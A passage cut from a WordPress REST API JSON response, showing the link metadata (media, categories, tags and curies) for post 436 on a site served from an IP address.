"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=436"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=436"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=436"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}